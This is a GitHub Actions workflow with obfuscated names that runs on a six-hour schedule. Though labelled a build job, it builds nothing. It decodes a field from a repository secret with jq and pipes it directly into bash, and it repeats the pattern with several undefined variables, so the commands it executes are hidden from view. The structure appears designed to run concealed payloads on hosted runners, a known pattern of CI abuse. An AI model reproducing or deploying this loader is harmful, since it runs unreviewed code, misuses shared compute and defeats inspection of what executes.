name: zhongguihong3948

on:
  workflow_dispatch:
  schedule:
    - cron: '16 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongguihong3948
        env:
          jx66: ${{ secrets.jx66 }}
        run: |
          echo $jx66 | jq -r .lm13 | /bin/bash
          echo $dvw65823 | jq -r .jar45 | /bin/bash
          echo $gse1 | jq -r .ml79 | /bin/bash
          echo $vpsn607 | jq -r .zoe10098 | /bin/bash
          echo $f2 | jq -r .fv09774 | /bin/bash
          echo $g1910 | jq -r .xrkkj45633 | /bin/bash
          echo $jsvo33227 | jq -r .nae4843 | /bin/bash

